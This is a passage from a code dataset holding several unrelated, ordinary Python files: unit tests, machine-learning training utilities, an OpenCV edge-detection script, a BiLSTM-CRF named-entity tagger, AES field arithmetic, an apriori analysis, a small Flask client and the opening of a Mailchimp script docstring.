'New York City'}]\n\nfor person in people:\n print(f'''\n First name: {person.get('first_name')}\n Last name: {person.get('last_name')}\n Age: {person.get('age')}\n City: {person.get('city')}\n ''')\n","sub_path":"chapter_06/6-07/people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"513594462","text":"\"\"\"\nMethods\n\nassertEqual(a, b)\nassertNotEqual(a, b)\nassertTrue(x)\nassertFalse(x)\nassertIs(a, b)\nassertIsNot(a, b)\nassertIsNone(x)\nassertIsNotNone(x)\nassertIn(a, b)\nassertNotIn(a, b)\nassertIsInstance(a, b)\nassertNotIsInstance(a, b)\n\"\"\"\nimport unittest\nimport pandas as pd\nimport numpy as np\nimport trikit\n\n\n\n# Ensure sample datasets have been properly loaded ----------------------------\n\nclass DatasetsTestCase(unittest.TestCase):\n\n def setUp(self):\n self.dactual = {\n \"raa\" :160987,\n \"ta83\" :34358090,\n \"autoliab\" :2197134,\n \"glre\" :56531053,\n \"singinjury\" :11026482.299999999,\n \"singproperty\":25101206.26,\n \"lrdb\" :10178930,\n \"amw09\" :92741342.0,\n }\n\n def test_raa(self):\n self.assertEqual(\n trikit.load(\"raa\").value.sum(), self.dactual[\"raa\"],\n \"Issue detected with raa sample dataset.\"\n )\n\n def test_ta83(self):\n self.assertEqual(\n trikit.load(\"ta83\").value.sum(), self.dactual[\"ta83\"],\n \"Issue detected with ta83 sample dataset.\"\n )\n\n def test_autoliab(self):\n self.assertEqual(\n trikit.load(\"autoliab\").value.sum(), self.dactual[\"autoliab\"],\n \"Issue detected with autoliab sample dataset.\"\n )\n\n def test_glre(self):\n self.assertEqual(\n trikit.load(\"glre\").value.sum(), self.dactual[\"glre\"],\n \"Issue detected with glre sample dataset.\"\n )\n\n def test_singinjury(self):\n self.assertEqual(\n trikit.load(\"singinjury\").value.sum(), self.dactual[\"singinjury\"],\n \"Issue detected with singinjury sample dataset.\"\n )\n\n def test_singproperty(self):\n self.assertEqual(\n trikit.load(\"singproperty\").value.sum(), self.dactual[\"singproperty\"],\n \"Issue detected with singproperty sample dataset.\"\n )\n\n def test_raa(self):\n self.assertEqual(\n trikit.load(\"raa\").value.sum(), self.dactual[\"raa\"],\n \"Issue detected with raa sample dataset.\"\n )\n\n def test_amw09(self):\n self.assertEqual(\n trikit.load(\"amw09\").value.sum(), self.dactual[\"amw09\"],\n \"Issue detected with amw09 sample dataset.\"\n )\n\n def test_lrdb(self):\n self.assertEqual(\n trikit.load_lrdb().value.sum(), self.dactual[\"lrdb\"],\n \"Issue detected with lrdb sample dataset.\"\n )\n\n\nif __name__ == \"__main__\":\n\n unittest.main()","sub_path":"trikit/tests/test_datasets_ut.py","file_name":"test_datasets_ut.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"135406431","text":"# Copyright 2021, Flyreel. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ========================================================================\nimport torch\nimport numpy as np\nfrom tqdm import trange\nimport torch.nn.functional as F\nimport torchvision.transforms.functional as TF\nfrom collections import OrderedDict\nfrom itertools import combinations\nimport logging\nimport os, errno\n\n\ndef to_device(objects, device):\n objs = []\n for obj in objects:\n objs.append(obj.to(device))\n return objs\n\n\ndef forward_pass(model, x, y, device):\n x = x.to(device)\n y = y.to(device)\n outputs = model(x)\n loss = F.cross_entropy(outputs, y, reduction='mean')\n return outputs, loss\n\n\ndef sigmoid_rampup(curr_iter, rampup_iters):\n \"\"\"Exponential rampup from https://arxiv.org/abs/1610.02242\"\"\"\n if rampup_iters == 0:\n return 1.0\n else:\n current = np.clip(curr_iter, 0.0, rampup_iters)\n phase = 1.0 - current / rampup_iters\n return float(np.exp(-5.0 * phase * phase))\n\n\ndef train(model, train_loader, unlabeled_loader, optimizer, args):\n # Initialize history object to record and compute statistics\n history = HistoryDict()\n \n # Switch to train mode\n model.train()\n\n train_iterator = iter(train_loader)\n unlabeled_iterator = iter(unlabeled_loader)\n for _ in trange(args.epoch_over, desc=f'Train Epoch {args.curr_epoch}', position=2):\n adjust_polynomial_lr(optimizer, args)\n args.curr_iter += 1\n history.update('lr', optimizer.param_groups[0]['lr'], n=1)\n \n try:\n inputs_t, targets_t = next(train_iterator)\n inputs_u, targets_u = next(unlabeled_iterator)\n except StopIteration:\n train_iterator = iter(train_loader)\n unlabeled_iterator = iter(unlabeled_loader)\n inputs_t, targets_t = next(train_iterator)\n inputs_u, targets_u = next(unlabeled_iterator)\n \n # Forward pass\n inputs_t, targets_t, inputs_u, targets_u = to_device(\n (inputs_t, targets_t, inputs_u, targets_u), device=args.device\n )\n outputs_t, outputs_u = model(inputs_t, inputs_u)\n \n loss_weight = args.loss_weight * sigmoid_rampup(args.curr_iter, args.stop_rampup)\n \n loss_t = F.cross_entropy(outputs_t, targets_t, reduction='mean')\n loss_u = F.cross_entropy(outputs_u, targets_u, reduction='mean')\n loss = loss_t + loss_u * loss_weight\n\n # Backprop\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n # Measure accuracy and record statistics\n acc, batch_size = accuracy(outputs_t.data, targets_t, topk=(1,))\n history.update('training loss', loss.item(), n=batch_size)\n history.update('training top1 accuracy', acc[0], n=batch_size)\n history.update('self-supervised weight', loss_weight, n=1)\n \n logging.info(\n 'Train Loss: {history[training loss].avg:.4f} '\n 'Train Acc: {history[training top1 accuracy].avg:.4f} '\n 'LR: {history[lr].value:.6f} '\n 'loss_w: {history[self-supervised weight].value:.2f}'.format(history=history)\n )\n\n\ndef evaluate(model, val_loader, args):\n # Initialize history object to record and compute statistics\n history = HistoryDict()\n\n # Switch to evaluate mode\n model.eval()\n\n val_iterator = iter(val_loader)\n for _ in trange(len(val_loader), desc=f'Val Epoch {args.curr_epoch}', position=2):\n inputs, targets = next(val_iterator)\n \n # Forward pass\n outputs, loss = forward_pass(model, inputs, targets, args.device)\n\n # measure accuracy and record loss\n acc, batch_size = accuracy(outputs.data, targets, topk=(1,))\n history.update('validation loss', loss.item(), n=batch_size)\n history.update('validation top1 accuracy', acc[0], n=batch_size)\n \n logging.info(\n 'Valid Loss: {history[validation loss].avg:.4f} '\n 'Valid Acc: {history[validation top1 accuracy].avg:.4f} '\n 'Valid Counts: {history[validation loss].count:d}'.format(history=history)\n )\n return history\n\n\nclass History():\n \"\"\"Compute and store history statistics\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.value = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, value, n=1):\n self.value = value\n self.sum += value * n\n self.count += n\n self.avg = self.sum / self.count\n\n\nclass HistoryDict():\n def __init__(self):\n self.history = {}\n\n def __getitem__(self, key):\n return self.history[key]\n\n def update(self, name, value, n=1):\n if not name in self.history:\n self.history[name] = History()\n self.history[name].update(value, n)\n\n def reset(self):\n for value in self.history.values():\n value.reset()\n\n def values(self, postfix=''):\n return {name + postfix: value.value for name, value in self.history.items()}\n\n def averages(self, postfix='/avg'):\n return {name + postfix: value.avg for name, value in self.history.items()}\n\n def sums(self, postfix='/sum'):\n return {name + postfix: value.sum for name, value in self.history.items()}\n\n def counts(self, postfix='/count'):\n return {name + postfix: value.count for name, value in self.history.items()}\n\n\nclass GammaCorrection():\n def __init__(self, r=(0.5, 2.0)):\n self.gamma_range = r\n \n def __call__(self, x):\n gamma = np.random.uniform(*self.gamma_range)\n return TF.adjust_gamma(x, gamma, gain=1)\n\n def __repr__(self):\n return self.__class__.__name__ + '(r={})'.format(self.gamma_range)\n\n \ndef adjust_polynomial_lr(optimizer, args):\n \"\"\"Decay learning rate according to polynomial schedule with warmup\"\"\"\n if args.curr_iter < args.warmup_iters:\n frac = args.curr_iter / args.warmup_iters\n step = args.lr - args.warmup_lr\n args.running_lr = args.warmup_lr + step * frac\n else:\n frac = (float(args.curr_iter) - args.warmup_iters) / (args.max_iters - args.warmup_iters)\n scale_running_lr = max((1.0 - frac), 0.) ** args.lr_pow\n args.running_lr = args.lr * scale_running_lr\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = args.running_lr\n \n \ndef accuracy(output, target, topk=(1,)):\n \"\"\"Compute topk accuracy\"\"\"\n output = output.cpu()\n target = target.cpu()\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return (res, batch_size)\n\n\ndef save_model(model, args, path):\n state_dict = OrderedDict({\n 'meta': args.__dict__,\n 'model_params': {\n 'backbone': model.module.backbone,\n 'pretrained': model.module.pretrained,\n 'num_labeled_classes': model.module.num_labeled_classes,\n 'num_unlabeled_classes': model.module.num_unlabeled_classes,\n 'dropout_rate': model.module.dropout_rate,\n 'global_pool': model.module.global_pool,\n },\n 'state_dict': model.module.state_dict(),\n })\n torch.save(state_dict, path)\n logging.info('=> Model checkpoint saved to {:s}'.format(path))\n\n\ndef load_model(Model, checkpoint_path, device):\n checkpoint = torch.load(checkpoint_path, map_location=device)\n checkpoint['model_params']['pretrained'] = False\n model = Model(**checkpoint['model_params'])\n model.load_state_dict(checkpoint['state_dict'])\n model.CLASSES = checkpoint['meta']['classes']\n return model.to(device)\n\n\ndef assert_same_classes(datasets):\n if len(datasets) == 1:\n return True\n same_classes = [x.class_to_idx == y.class_to_idx for x, y in combinations(datasets, r=2)]\n assert all(same_classes), \\\n f'The following have mismatched subdirectory names. Check the `Root location`.\\n{datasets}'\n\n\ndef validate_paths(paths):\n for path in paths:\n if not os.path.exists(path):\n raise FileNotFoundError(\n errno.ENOENT, os.strerror(errno.ENOENT), path\n )\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"96434232","text":"import cv2\nimport numpy as np\nscale = 1\ndelta = 0\nddepth = cv2.CV_16S\nimg = cv2.imread('liver.jpg')\nimg = cv2.GaussianBlur(img,(3,3),0)\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n# Gradient-X\ngrad_x = cv2.Sobel(gray,ddepth,1,0,ksize = 3, scale = scale, delta = delta,borderType = cv2.BORDER_DEFAULT)\n#grad_x = cv2.Scharr(gray,ddepth,1,0)\n# Gradient-Y\ngrad_y = cv2.Sobel(gray,ddepth,0,1,ksize = 3, scale = scale, delta = delta, borderType = cv2.BORDER_DEFAULT)\n#grad_y = cv2.Scharr(gray,ddepth,0,1)\nabs_grad_x = cv2.convertScaleAbs(grad_x) # converting back to uint8\nabs_grad_y = cv2.convertScaleAbs(grad_y)\ndst = cv2.addWeighted(abs_grad_x,0.5,abs_grad_y,0.5,0)\n#dst = cv2.add(abs_grad_x,abs_grad_y)\ncv2.imshow('dst',dst)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n# To see the results, visit : http://opencvpython.blogspot.com/2012/06/image-derivatives-sobel-and-scharr.html\n","sub_path":"Thammu/sobs.py","file_name":"sobs.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"457189045","text":"\"\"\"\n\n@file : 001-rnn+lstm+crf.py\n\n@author: xiaolu\n\n@time : 2019-09-06\n\n\"\"\"\nimport re\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import classification_report\n\n\nclass Model:\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n '''\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n '''\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(\n tf.nn.rnn_cell.LSTMCell(size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout\n )\n\n # 1. define input\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n\n # 2. embedding\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.char_ids)\n\n s = tf.shape(char_embedded) # (51312, 50, 27, embedding_size)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2], dim_char])\n\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn(\n cell_fw=cells(hidden_size_char),\n cell_bw=cells(hidden_size_char),\n inputs=char_embedded,\n dtype=tf.float32,\n scope='bidirectional_rnn_char_%d' % n\n )\n char_embedded = tf.concat((out_fw, out_bw), 2)\n\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2*hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1) # 将词嵌入部分与字符嵌入通过双向lstm输出部分进行拼接\n\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn(\n cell_fw=cells(hidden_size_word),\n cell_bw=cells(hidden_size_word),\n inputs=word_embedded,\n dtype=tf.float32,\n scope='bidirectional_rnn_word_%d' % n\n )\n word_embedded = tf.concat((out_fw, out_bw), 2)\n\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths\n )\n\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(\n logits, transition_params, self.lengths\n )\n\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n\n y_t = tf.cast(y_t, tf.int32)\n\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n '''\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n '''\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n '''\n :param string:\n :return:\n '''\n string= re.sub('[^A-Za-z0-9\\-\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\ndef to_title(string):\n if string.isupper():\n string = string.title()\n return string\n\n\ndef parse_XY(texts, labels):\n '''\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n '''\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower() # 当前这个单词转小写\n tag = labels[no] # 取出对应的词性\n for c in text: # 字符表\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx: # 词性表\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag]) # 当前这个词的词性转为id的值\n if text not in word2idx: # 词表\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text]) # 将词转为id的标号\n return X, np.array(Y)\n\n\ndef iter_seq(x):\n return np.array([x[i: i+seq_len] for i in range(0, len(x)-seq_len, 1)])\n\n\ndef to_train_seq(*args):\n '''\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n '''\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n '''\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n '''\n x = [[len(idx2word[i]) for i in k] for k in batch] # 得出每个单词的长度\n maxlen = max([j for i in x for j in i]) # 最大长度\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1-no] = char2idx[c]\n return temp # [文章数, 单词个数, maxlen(每个单词按字符转的id)]\n\n\ndef pred2label(pred):\n # 将预测结果转为标签\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\nif __name__ == '__main__':\n left_train, right_train = parse('./data/eng.train')\n left_test, right_test = parse('./data/eng.testa')\n # print(left_train[:10])\n # print(right_train[:10])\n\n word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2} # 词表\n tag2idx = {'PAD': 0} # 词性表\n char2idx = {'PAD': 0}\n word_idx = 3\n tag_idx = 1\n char_idx = 1\n\n train_X, train_Y = parse_XY(left_train, right_train)\n test_X, test_Y = parse_XY(left_test, right_test)\n # print(train_X[:20])\n # print(train_Y[:20])\n\n idx2word = {idx: tag for tag, idx in word2idx.items()}\n idx2tag = {i: w for w, i in tag2idx.items()}\n\n seq_len = 50\n\n X_seq, Y_seq = to_train_seq(train_X, train_Y) # 长度为50为一个段落\n X_char_seq = generate_char_seq(X_seq)\n print(X_seq.shape) # (203571, 50)\n print(X_char_seq.shape) # (203571, 50, 61)\n\n X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y)\n X_char_seq_test = generate_char_seq(X_seq_test)\n print(X_seq_test.shape) # (51312, 50)\n print(X_char_seq_test.shape) # (51312, 50, 27)\n\n train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq\n test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test\n\n tf.reset_default_graph()\n sess = tf.Session()\n\n dim_word = 64\n dim_char = 128\n dropout = 0.8\n learning_rate = 1e-3\n hidden_size_char = 128\n hidden_size_word = 128\n num_layers = 2\n batch_size = 32\n\n model = Model(dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers)\n sess.run(tf.global_variables_initializer())\n\n for e in range(3):\n train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0\n for i in range(0, len(train_X), batch_size):\n\n batch_x = train_X[i: min(i + batch_size, train_X.shape[0])]\n batch_char = train_char[i: min(i + batch_size, train_X.shape[0])]\n batch_y = train_Y[i: min(i + batch_size, train_X.shape[0])]\n\n acc, cost, _ = sess.run(\n [model.accuracy, model.cost, model.optimizer],\n feed_dict={\n model.word_ids: batch_x,\n model.char_ids: batch_char,\n model.labels: batch_y\n },\n )\n train_loss += cost\n train_acc += acc\n print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc))\n\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i: min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i: min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])]\n acc, cost = sess.run(\n [model.accuracy, model.cost],\n feed_dict={\n model.word_ids: batch_x,\n model.char_ids: batch_char,\n model.labels: batch_y\n },\n )\n test_loss += cost\n test_acc += acc\n print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc))\n\n train_loss /= len(train_X) / batch_size\n train_acc /= len(train_X) / batch_size\n test_loss /= len(test_X) / batch_size\n test_acc /= len(test_X) / batch_size\n\n print('epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\\n'\n % (e, train_loss, train_acc, test_loss, test_acc))\n\n real_Y, predict_Y = [], []\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i: min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i: min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])]\n predicted = pred2label(\n sess.run(model.tags_seq,\n feed_dict={\n model.word_ids: batch_x,\n model.char_ids: batch_char,\n },\n )\n )\n real = pred2label(batch_y)\n predict_Y.extend(predicted)\n real_Y.extend(real)\n\n print(classification_report(np.array(real_Y).ravel(), np.array(predict_Y).ravel()))","sub_path":"Entity_Posing/001-rnn+lstm+crf.py","file_name":"001-rnn+lstm+crf.py","file_ext":"py","file_size_in_byte":11032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"454372911","text":"import subprocess\r\n\r\nimport sys\r\nfrom time import time, sleep\r\nimport matplotlib.pyplot\r\n\r\n\r\nNum = int(sys.argv[1])\r\nname = str(sys.argv[2])\r\n\r\nfor i in range(Num):\r\n subprocess.call(['python', 'MultiPro.py', str(i), str(Num), name])\r\n\r\nresult = 0\r\nt = []\r\n\r\nfor i in range(Num):\r\n file = open('Task' + str(i) + '.txt', 'r')\r\n result = result ^ int(file.readline())\r\n t.append(float(file.readline()))\r\n file.close()\r\n\r\n\r\n\r\nx=[]\r\n\r\nfor i in range(10):\r\n x.append(i)\r\n\r\n\r\n\r\n\r\n\r\nmatplotlib.pyplot.plot(x,t)\r\nmatplotlib.pyplot.xlabel(\"Iteration\")\r\nmatplotlib.pyplot.ylabel(\"Time\")\r\nmatplotlib.pyplot.show()\r\n\r\nfile = open('FinalResult_proj1.txt', 'w')\r\nfile.write('\\n'.join([(\"FinalResult:\"),str(result),(\"Time:\"), str(max(t))]))\r\nfile.close()\r\n","sub_path":"Project1/Os_Project1_main.py","file_name":"Os_Project1_main.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"255916756","text":"def gmod(n,p): # 283 is standard, see gmultiply\n # leave leading '0b'\n b = len(bin(p))\n \n # repeatedly\n while True:\n if n < 256:\n return n\n # shift p out to match n\n d = p << (len(bin(n)) - b)\n n = n ^ d\n\ndef gmultiply(a,b,p=283):\n # for efficiency\n # if a < b:\n # a,b = b,a\n \n # the digits of binary b (reversed)\n s = bin(b)[2:][::-1]\n \n r = 0\n # for each digit in b (reversed)\n # add a to accumulated result\n # where a is left-shifted \n # by digit's place in b (reversed)\n for c in s:\n if c == '1':\n r = r ^ a # addition\n a = a << 1 # left-shift\n return gmod(r,p)\n\ndef xor_reduce(L):\n r = 0\n for n in L:\n r = r ^ n\n return r\n","sub_path":"AES-math/code/gmath.py","file_name":"gmath.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"475218475","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 28 12:44:55 2016\r\n\r\n@author: sims01\r\n\"\"\"\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\ndef padLightFieldData(originalArray, pixPer_ulens_i, rawLF_iDim, rawLF_jDim, padAxis): \r\n # calculate number of virtual pixels\r\n virPix_iDim = int(np.floor(np.divide(rawLF_iDim, pixPer_ulens_i)))\r\n \r\n # calc modulus\r\n # corresponds to number rows/ cols req\r\n pixelDeficiency = np.mod(rawLF_iDim, pixPer_ulens_i)\r\n \r\n if pixelDeficiency != 0:\r\n \r\n # add 1 to the number of virtualPix\r\n virPix_iDim = virPix_iDim + 1\r\n \r\n # calculate number of additional pixels required\r\n reqAddPix = pixPer_ulens_i - pixelDeficiency\r\n \r\n # create appropriate zero array\r\n addPixArray = np.zeros([reqAddPix, rawLF_jDim])\r\n \r\n if padAxis == 0:\r\n # pad array with required number of pixels\r\n paddedLightFieldData = np.concatenate((originalArray,addPixArray),axis=padAxis)\r\n \r\n if padAxis == 1:\r\n paddedLightFieldData = np.concatenate((originalArray,addPixArray.T),axis=padAxis)\r\n \r\n else:\r\n paddedLightFieldData = originalArray\r\n \r\n return paddedLightFieldData, virPix_iDim\r\n\r\ndef genSupApArray(virPixArray, subApArray, pixPer_uLensX, pixPer_uLensY):\r\n for apIndX in range(pixPer_uLensX):\r\n for apIndY in range(pixPer_uLensY):\r\n subApArray[:,:,apIndX,apIndY] = virPixArray[apIndX,:,apIndY,:];\r\n return \r\n\r\n#def showSupApImSequence(apCoordsX, apCoordsY, subApArray):\r\n# # loop all sub-aperture images\r\n# for apIndX in (apCoordsX):\r\n# for apIndY in (apCoordsY):\r\n# subApIm = subApArray[:,:,apIndX,apIndY]\r\n# plt.imshow(subApIm, cmap = 'gray')\r\n# plt.xticks([]), plt.yticks([])\r\n# plt.pause(.1) \r\n# plt.show()\r\n# return\r\n\r\ndef showImSequence(imInCoordsX, imInCoordsY, imArray, imType):\r\n # loop through all images\r\n for imIndX in (imInCoordsX):\r\n for imIndY in (imInCoordsY):\r\n if imType == 'virPix':\r\n subIm = imArray[:,imIndX,:,imIndY]\r\n if imType == 'subAp':\r\n subIm = imArray[:,:,imIndX,imIndY]\r\n plt.imshow(subIm, cmap = 'gray')\r\n plt.xticks([]), plt.yticks([])\r\n plt.pause(.1) \r\n plt.show()\r\n return","sub_path":"lfImRecon.py","file_name":"lfImRecon.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"285153820","text":"#import libraries\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#import apriori functionn\nfrom apyori import apriori\n\n#read dataset\ndataset=pd.read_csv('BreadBasket_DMS.csv')\n\n#drop column of date and column\ndataset=dataset.drop(['Date', 'Time'], axis=1)\n\n#plot pie chart of top 15 selling items \ndataset['Item'].value_counts()[:16].plot.pie()\n\n#initialize transactions\ntransactions=[]\n\n#apply loop\n#for i in range(1,9685):\n# transaction.append([str(dataset['Item'][j]) if dataset['Transaction'][j]==str(i) for j in range(0,21293)])\n\n#convert series to list\ndef convert_tolist(arg):\n# lst=arg.values\n transactions.append(list(set(arg)))\n \n \n\n#convert dataset to lists of lists\ndataset.groupby(['Transaction'])['Item'].apply(convert_tolist)\n\n#apply apriori on the dataset\nrules=apriori(transactions, min_support=0.0025, min_confidence=0.2, min_lift=3)\n\n#convert rules to list\nresults=list(rules)\n\n\n#print item in sophisticated way\nfor item in results:\n\n # first index of the inner list\n # Contains base item and add item\n pair = item[0] \n items = [x for x in pair]\n print(\"Rule: \" + items[0] + \" -> \" + items[1])\n\n #second index of the inner list\n print(\"Support: \" + str(item[1]))\n\n #third index of the list located at 0th\n #of the third index of the inner list\n\n print(\"Confidence: \" + str(item[2][0][2]))\n print(\"Lift: \" + str(item[2][0][3]))\n print(\"=====================================\")\n \n \n\n","sub_path":"Day 23/BreadBasket_DMS.py","file_name":"BreadBasket_DMS.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"346438737","text":"'''\nCreated on Apr 30, 2018\nCopyright (c) 2017-2018 Alberto Monge Roffarello\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License\n@author: alberto-mr\n'''\n\n\nimport requests\nimport json\n\n\ndef print_tasks_from_server():\n '''\n Get the list of tasks from the server in JSON\n '''\n\n #get JSON from server\n resp = requests.get('http://127.0.0.1:5000/api/v1.0/tasks')\n if resp.status_code != 200:\n print(\"Error: the list of tasks is not available at this moment.\")\n else:\n #for each element in tasks we print the content\n for task in json.loads(resp.text)['tasks']:\n print(task['description'] + \" \" +str(task['urgent']))\n\n\nif __name__ == '__main__':\n # main program\n print_tasks_from_server()","sub_path":"python-lab7/task_client.py","file_name":"task_client.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"329576483","text":"#!/usr/bin/env python\n\n\"\"\"\nDescription:\n For every lot the script will:\n - look for latest briefs for Digital Outcomes and Specialists\n - if there are new briefs on that lot:\n - it will create a Mailchimp campaign\n - it will set the content of the campaign to be the briefs found\n - it will send that campaign to the list_id as referenced in the `lots` variable\n - if there are no new briefs on that lot no campaign is created or sent\n\n Number of days tells the script for how many days before current date it should include in its search for briefs\n example: if you run this script on a Wednesday and set number of days=1,\n then it will only include briefs from Tuesday (preceding day).\n example2: if you run it on Wednesday and set number of days=3,\n then it will include all briefs published on Sunday, Monday and Tuesday.\n By default, the script will send 3 days of briefs on a Monday (briefs from Fri, Sat, Sun) and 1 day on all other\n 